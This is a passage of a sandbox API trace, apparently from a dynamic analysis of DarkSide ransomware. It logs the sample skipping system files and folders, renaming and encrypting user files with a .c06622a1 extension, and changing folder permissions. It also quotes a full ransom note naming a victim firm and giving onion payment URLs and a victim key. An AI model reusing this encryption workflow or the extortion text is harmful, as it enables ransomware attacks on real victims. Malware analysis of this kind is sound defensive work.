_Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.015] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\6JN0wpz-eY.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\6jn0wpz-ey.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\6JN0wpz-eY.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\6jn0wpz-ey.mkv.c06622a1"), dwFlags=0x8) returned 1 [0148.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\6JN0wpz-eY.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\6jn0wpz-ey.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x654 [0148.030] CreateIoCompletionPort (FileHandle=0x654, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.030] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4af0020 [0148.036] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x18a8eb54 [0148.037] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x50fcf12f [0148.037] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x53fca165 [0148.037] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4b9babd5 [0148.037] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x464fd0bc [0148.037] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2388958a [0148.037] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7fd9b341 [0148.037] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6c70b234 [0148.040] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4af0094, Length=0x80) returned 0x230b84bb [0148.040] RtlComputeCrc32 (PartialCrc=0x84bb, Buffer=0x4af0094, Length=0x80) returned 0x89d8649e [0148.040] RtlComputeCrc32 (PartialCrc=0x649e, Buffer=0x4af0094, Length=0x80) returned 0xa301d75f [0148.040] RtlComputeCrc32 (PartialCrc=0xd75f, Buffer=0x4af0094, Length=0x80) returned 0x582da124 [0148.040] RtlComputeCrc32 (PartialCrc=0xa124, Buffer=0x4af0094, Length=0x80) returned 0xfadefee9 [0148.040] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4af0020) returned 1 [0148.040] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0148.040] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0148.040] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd3ae2e0, ftCreationTime.dwHighDateTime=0x1d5dc3a, ftLastAccessTime.dwLowDateTime=0x323e0180, ftLastAccessTime.dwHighDateTime=0x1d5e60f, ftLastWriteTime.dwLowDateTime=0x323e0180, ftLastWriteTime.dwHighDateTime=0x1d5e60f, nFileSizeHigh=0x0, nFileSizeLow=0xbf7e, dwReserved0=0x0, dwReserved1=0x0, cFileName="AP6Dhi.swf", cAlternateFileName="")) returned 1 [0148.040] _wcsicmp (_Str1="AP6Dhi.swf", _Str2="README.c06622a1.TXT") returned -17 [0148.040] wcsstr (_Str="AP6Dhi.swf", _SubStr="README") returned 0x0 [0148.040] _wcsicmp (_Str1="autorun.inf", _Str2="AP6Dhi.swf") returned 5 [0148.040] wcslen (_String="autorun.inf") returned 0xb [0148.040] _wcsicmp (_Str1="boot.ini", _Str2="AP6Dhi.swf") returned 1 [0148.040] wcslen (_String="boot.ini") returned 0x8 [0148.040] _wcsicmp (_Str1="bootfont.bin", _Str2="AP6Dhi.swf") returned 1 [0148.040] wcslen (_String="bootfont.bin") returned 0xc [0148.040] _wcsicmp (_Str1="bootsect.bak", _Str2="AP6Dhi.swf") returned 1 [0148.040] wcslen (_String="bootsect.bak") returned 0xc [0148.041] _wcsicmp (_Str1="desktop.ini", _Str2="AP6Dhi.swf") returned 3 [0148.041] wcslen (_String="desktop.ini") returned 0xb [0148.041] _wcsicmp (_Str1="iconcache.db", _Str2="AP6Dhi.swf") returned 8 [0148.041] wcslen (_String="iconcache.db") returned 0xc [0148.041] _wcsicmp (_Str1="ntldr", _Str2="AP6Dhi.swf") returned 13 [0148.041] wcslen (_String="ntldr") returned 0x5 [0148.041] _wcsicmp (_Str1="ntuser.dat", _Str2="AP6Dhi.swf") returned 13 [0148.041] wcslen (_String="ntuser.dat") returned 0xa [0148.041] _wcsicmp (_Str1="ntuser.dat.log", _Str2="AP6Dhi.swf") returned 13 [0148.041] wcslen (_String="ntuser.dat.log") returned 0xe [0148.041] _wcsicmp (_Str1="ntuser.ini", _Str2="AP6Dhi.swf") returned 13 [0148.041] wcslen (_String="ntuser.ini") returned 0xa [0148.041] _wcsicmp (_Str1="thumbs.db", _Str2="AP6Dhi.swf") returned 19 [0148.041] wcslen (_String="thumbs.db") returned 0x9 [0148.041] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0148.041] wcslen (_String="386") returned 0x3 [0148.041] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0148.041] wcslen (_String="adv") returned 0x3 [0148.041] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0148.041] wcslen (_String="ani") returned 0x3 [0148.041] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0148.041] wcslen (_String="bat") returned 0x3 [0148.041] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0148.041] wcslen (_String="bin") returned 0x3 [0148.041] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0148.041] wcslen (_String="cab") returned 0x3 [0148.041] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0148.041] wcslen (_String="cmd") returned 0x3 [0148.042] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0148.042] wcslen (_String="com") returned 0x3 [0148.042] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0148.042] wcslen (_String="cpl") returned 0x3 [0148.042] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0148.042] wcslen (_String="cur") returned 0x3 [0148.042] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0148.042] wcslen (_String="deskthemepack") returned 0xd [0148.042] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0148.042] wcslen (_String="diagcab") returned 0x7 [0148.042] _wcsicmp (_Str1="diagcfg", _Str2="swf") returned -15 [0148.042] wcslen (_String="diagcfg") returned 0x7 [0148.042] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0148.042] wcslen (_String="diagpkg") returned 0x7 [0148.042] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0148.042] wcslen (_String="dll") returned 0x3 [0148.042] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0148.042] wcslen (_String="drv") returned 0x3 [0148.042] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0148.042] wcslen (_String="exe") returned 0x3 [0148.042] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0148.042] wcslen (_String="hlp") returned 0x3 [0148.042] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0148.042] wcslen (_String="icl") returned 0x3 [0148.042] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0148.042] wcslen (_String="icns") returned 0x4 [0148.042] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0148.042] wcslen (_String="ico") returned 0x3 [0148.043] _wcsicmp (_Str1="ics", _Str2="swf") returned -10 [0148.043] wcslen (_String="ics") returned 0x3 [0148.043] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0148.043] wcslen (_String="idx") returned 0x3 [0148.043] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0148.043] wcslen (_String="ldf") returned 0x3 [0148.043] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0148.043] wcslen (_String="lnk") returned 0x3 [0148.043] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0148.043] wcslen (_String="mod") returned 0x3 [0148.043] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0148.043] wcslen (_String="mpa") returned 0x3 [0148.043] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0148.043] wcslen (_String="msc") returned 0x3 [0148.043] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0148.043] wcslen (_String="msp") returned 0x3 [0148.043] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0148.043] wcslen (_String="msstyles") returned 0x8 [0148.043] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0148.043] wcslen (_String="msu") returned 0x3 [0148.043] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0148.043] wcslen (_String="nls") returned 0x3 [0148.043] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0148.043] wcslen (_String="nomedia") returned 0x7 [0148.043] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0148.043] wcslen (_String="ocx") returned 0x3 [0148.043] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0148.043] wcslen (_String="prf") returned 0x3 [0148.044] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0148.044] wcslen (_String="ps1") returned 0x3 [0148.044] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0148.044] wcslen (_String="rom") returned 0x3 [0148.044] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0148.044] wcslen (_String="rtp") returned 0x3 [0148.044] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0148.044] wcslen (_String="scr") returned 0x3 [0148.044] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0148.044] wcslen (_String="shs") returned 0x3 [0148.044] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0148.044] wcslen (_String="spl") returned 0x3 [0148.044] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0148.044] wcslen (_String="sys") returned 0x3 [0148.044] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0148.044] wcslen (_String="theme") returned 0x5 [0148.044] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0148.044] wcslen (_String="themepack") returned 0x9 [0148.044] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0148.044] wcslen (_String="wpx") returned 0x3 [0148.044] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0148.044] wcslen (_String="lock") returned 0x4 [0148.044] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0148.044] wcslen (_String="key") returned 0x3 [0148.044] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0148.044] wcslen (_String="hta") returned 0x3 [0148.044] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0148.044] wcslen (_String="msi") returned 0x3 [0148.044] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0148.045] wcslen (_String="pdb") returned 0x3 [0148.045] _wcsicmp (_Str1="sql", _Str2="swf") returned -6 [0148.045] wcslen (_String="sql") returned 0x3 [0148.045] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0148.045] wcslen (_String="sqlite") returned 0x6 [0148.045] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w")) returned 0x10 [0148.045] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0148.045] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" [0148.045] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w") returned 0x35 [0148.045] wcscpy (in: _Dest=0x45000fc, _Source="AP6Dhi.swf" | out: _Dest="AP6Dhi.swf") returned="AP6Dhi.swf" [0148.045] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\AP6Dhi.swf", dwFileAttributes=0x80) returned 1 [0148.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\AP6Dhi.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\ap6dhi.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0148.066] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.066] ReadFile (in: hFile=0x644, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0148.067] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x2a1814d4 [0148.067] RtlComputeCrc32 (PartialCrc=0x14d4, Buffer=0x3fe8f4, Length=0x80) returned 0x699ccc2e [0148.067] RtlComputeCrc32 (PartialCrc=0xcc2e, Buffer=0x3fe8f4, Length=0x80) returned 0xdd65ec37 [0148.067] RtlComputeCrc32 (PartialCrc=0xec37, Buffer=0x3fe8f4, Length=0x80) returned 0x190fc92b [0148.067] RtlComputeCrc32 (PartialCrc=0xc92b, Buffer=0x3fe8f4, Length=0x80) returned 0xc88f563 [0148.067] CloseHandle (hObject=0x644) returned 1 [0148.067] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0148.067] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\AP6Dhi.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\AP6Dhi.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\AP6Dhi.swf" [0148.067] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\AP6Dhi.swf") returned 0x40 [0148.067] wcscpy (in: _Dest=0x4510118, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.067] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\AP6Dhi.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\ap6dhi.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\AP6Dhi.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\ap6dhi.swf.c06622a1"), dwFlags=0x8) returned 1 [0148.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\AP6Dhi.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\ap6dhi.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x644 [0148.073] CreateIoCompletionPort (FileHandle=0x644, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.073] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0148.078] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5bda7e74 [0148.078] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3db6c1b1 [0148.078] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4d5982ca [0148.078] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2f80fb76 [0148.078] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x24a467dd [0148.078] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x74f57537 [0148.078] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x48a5b69d [0148.078] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x41746c59 [0148.081] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0x2312bac0 [0148.081] RtlComputeCrc32 (PartialCrc=0xbac0, Buffer=0x2f30094, Length=0x80) returned 0x57fa4be9 [0148.081] RtlComputeCrc32 (PartialCrc=0x4be9, Buffer=0x2f30094, Length=0x80) returned 0x53f0d78e [0148.081] RtlComputeCrc32 (PartialCrc=0xd78e, Buffer=0x2f30094, Length=0x80) returned 0xa40bdbdd [0148.081] RtlComputeCrc32 (PartialCrc=0xdbdd, Buffer=0x2f30094, Length=0x80) returned 0x108febcd [0148.081] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0148.081] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0148.081] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0148.081] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5077a0b0, ftCreationTime.dwHighDateTime=0x1d5dd5a, ftLastAccessTime.dwLowDateTime=0x2e4cfb40, ftLastAccessTime.dwHighDateTime=0x1d5e74e, ftLastWriteTime.dwLowDateTime=0x2e4cfb40, ftLastWriteTime.dwHighDateTime=0x1d5e74e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cnsWpPMO1m-nsTwgc", cAlternateFileName="CNSWPP~1")) returned 1 [0148.081] _wcsicmp (_Str1="$recycle.bin", _Str2="cnsWpPMO1m-nsTwgc") returned -63 [0148.081] wcslen (_String="$recycle.bin") returned 0xc [0148.081] _wcsicmp (_Str1="config.msi", _Str2="cnsWpPMO1m-nsTwgc") returned 1 [0148.081] wcslen (_String="config.msi") returned 0xa [0148.081] _wcsicmp (_Str1="$windows.~bt", _Str2="cnsWpPMO1m-nsTwgc") returned -63 [0148.081] wcslen (_String="$windows.~bt") returned 0xc [0148.082] _wcsicmp (_Str1="$windows.~ws", _Str2="cnsWpPMO1m-nsTwgc") returned -63 [0148.082] wcslen (_String="$windows.~ws") returned 0xc [0148.082] _wcsicmp (_Str1="windows", _Str2="cnsWpPMO1m-nsTwgc") returned 20 [0148.082] wcslen (_String="windows") returned 0x7 [0148.082] _wcsicmp (_Str1="appdata", _Str2="cnsWpPMO1m-nsTwgc") returned -2 [0148.082] wcslen (_String="appdata") returned 0x7 [0148.082] _wcsicmp (_Str1="application data", _Str2="cnsWpPMO1m-nsTwgc") returned -2 [0148.082] wcslen (_String="application data") returned 0x10 [0148.082] _wcsicmp (_Str1="boot", _Str2="cnsWpPMO1m-nsTwgc") returned -1 [0148.082] wcslen (_String="boot") returned 0x4 [0148.082] _wcsicmp (_Str1="google", _Str2="cnsWpPMO1m-nsTwgc") returned 4 [0148.082] wcslen (_String="google") returned 0x6 [0148.082] _wcsicmp (_Str1="mozilla", _Str2="cnsWpPMO1m-nsTwgc") returned 10 [0148.082] wcslen (_String="mozilla") returned 0x7 [0148.082] _wcsicmp (_Str1="program files", _Str2="cnsWpPMO1m-nsTwgc") returned 13 [0148.082] wcslen (_String="program files") returned 0xd [0148.082] _wcsicmp (_Str1="program files (x86)", _Str2="cnsWpPMO1m-nsTwgc") returned 13 [0148.082] wcslen (_String="program files (x86)") returned 0x13 [0148.082] _wcsicmp (_Str1="programdata", _Str2="cnsWpPMO1m-nsTwgc") returned 13 [0148.082] wcslen (_String="programdata") returned 0xb [0148.082] _wcsicmp (_Str1="system volume information", _Str2="cnsWpPMO1m-nsTwgc") returned 16 [0148.082] wcslen (_String="system volume information") returned 0x19 [0148.082] _wcsicmp (_Str1="tor browser", _Str2="cnsWpPMO1m-nsTwgc") returned 17 [0148.082] wcslen (_String="tor browser") returned 0xb [0148.082] _wcsicmp (_Str1="windows.old", _Str2="cnsWpPMO1m-nsTwgc") returned 20 [0148.082] wcslen (_String="windows.old") returned 0xb [0148.082] _wcsicmp (_Str1="intel", _Str2="cnsWpPMO1m-nsTwgc") returned 6 [0148.082] wcslen (_String="intel") returned 0x5 [0148.082] _wcsicmp (_Str1="msocache", _Str2="cnsWpPMO1m-nsTwgc") returned 10 [0148.082] wcslen (_String="msocache") returned 0x8 [0148.082] _wcsicmp (_Str1="perflogs", _Str2="cnsWpPMO1m-nsTwgc") returned 13 [0148.082] wcslen (_String="perflogs") returned 0x8 [0148.082] _wcsicmp (_Str1="x64dbg", _Str2="cnsWpPMO1m-nsTwgc") returned 21 [0148.082] wcslen (_String="x64dbg") returned 0x6 [0148.082] _wcsicmp (_Str1="public", _Str2="cnsWpPMO1m-nsTwgc") returned 13 [0148.082] wcslen (_String="public") returned 0x6 [0148.082] _wcsicmp (_Str1="all users", _Str2="cnsWpPMO1m-nsTwgc") returned -2 [0148.083] wcslen (_String="all users") returned 0x9 [0148.083] _wcsicmp (_Str1="default", _Str2="cnsWpPMO1m-nsTwgc") returned 1 [0148.083] wcslen (_String="default") returned 0x7 [0148.083] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\*" [0148.083] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\*") returned 0x37 [0148.083] wcscpy (in: _Dest=0x44e00ec, _Source="cnsWpPMO1m-nsTwgc" | out: _Dest="cnsWpPMO1m-nsTwgc") returned="cnsWpPMO1m-nsTwgc" [0148.083] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0148.083] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0148.084] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc" [0148.084] GetNamedSecurityInfoW () returned 0x0 [0148.084] SetEntriesInAclW () returned 0x0 [0148.084] SetNamedSecurityInfoW () returned 0x0 [0148.086] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d571f8) returned 1 [0148.086] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe5bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0148.086] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\cnswppmo1m-nstwgc")) returned 1 [0148.086] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0148.086] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\cnswppmo1m-nstwgc\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0148.088] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe58c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe58c*=0xa8f, lpOverlapped=0x0) returned 1 [0148.088] CloseHandle (hObject=0x1c) returned 1 [0148.089] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0148.089] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\cnswppmo1m-nstwgc")) returned 0x10 [0148.089] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\") returned="" [0148.089] wcslen 